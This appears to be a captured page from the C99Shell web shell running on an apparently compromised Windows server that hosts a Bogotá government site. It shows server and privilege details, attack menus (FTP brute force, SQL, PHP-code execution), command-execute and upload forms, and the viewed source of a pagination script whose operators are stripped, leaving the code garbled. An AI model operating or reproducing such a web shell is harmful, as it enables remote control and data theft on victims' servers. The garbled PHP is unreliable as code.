!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\actores\Secretariaambiente\   drwxrwxrwx
Free 3.24 GB of 39.52 GB (8.2%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     consulta_pagina.php (1.86 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
require('conn/conexion.php');
require(
'functions.php');
if (!(isset(
$pagenum)))  {  
   
$pagenum 1;  


//$max=limit 10;
//This is your query again, the same one... the only difference is we add $max into it
$data mysql_query("SELECT * FROM reg_organizaciones") or die(mysql_error());  
$rows mysql_num_rows($data);  
 
$page_rows 4;
 
$last ceil($rows/$page_rows); 
  if (
$pagenum 1)  {  
     
$pagenum 1;  
  }  elseif (
$pagenum $last)  {  
            
$pagenum $last;  
           } 
 
$max 'limit ' .($pagenum 1) * $page_rows .',' .$page_rows ";";
 
//echo $max;
 
$data_p mysql_query("SELECT * FROM reg_organizaciones $max") or die(mysql_error());
 
//This is where you display your query results 
 
while($info mysql_fetch_array$data_p ))  
 {  
    print 
$info['nombre'];  
    echo 
"<br>"
 }  
 
 echo 
"<p>";  
 
// This shows the user what page they are on, and the total number of pages 
 
echo " --Pagina $pagenum de $last-- <p>";  
 
// First we check if we are on page one. If we are then we don't need a link to the previous page or the first page so we do nothing. If we aren't then we generate links to the first page, and to the previous page. 
 
if ($pagenum == 1)  
 { 
  }  else {
               echo 
" <a href='{$_SERVER['PHP_SELF']}?pagenum=1'> <<-Primero</a> "
            echo 
" "
            
$previous $pagenum-1
            echo 
" <a href='{$_SERVER['PHP_SELF']}?pagenum=$previous'> <-Anterior</a> "
          }

//just a spacer 
echo " ---- "
//This does the same as above, only checking if we are on the last page, and then generating the Next and Last links 
if ($pagenum == $last)  { 
}  else 
       { 
        
$next $pagenum+1
        echo 
" <a href='{$_SERVER['PHP_SELF']}?pagenum=$next'>Siguiente -></a> "
        echo 
" "
        echo 
" <a href='{$_SERVER['PHP_SELF']}?pagenum=$last'>Ultimo ->></a> "
       }  
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--